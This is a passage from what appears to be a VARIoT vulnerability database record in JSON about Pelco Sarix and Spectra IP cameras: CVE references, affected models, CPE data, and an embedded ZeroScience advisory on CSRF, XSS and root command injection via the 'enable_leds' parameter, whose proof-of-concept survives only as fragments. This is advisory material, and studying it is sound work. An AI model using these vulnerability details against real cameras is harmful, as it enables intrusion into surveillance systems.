"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T20:29:01.340000",
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"date": "2019-05-24T18:15:23.483000",
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"date": "2019-05-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Vulnerable to improper neutralization of special elements in data query logic",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
],
"trust": 0.6
}
}
VAR-201905-1040
Vulnerability from variot - Updated: 2023-12-18 12:18A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1040",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric spectra enhanced ptz camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras csrf enable ssh root access",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
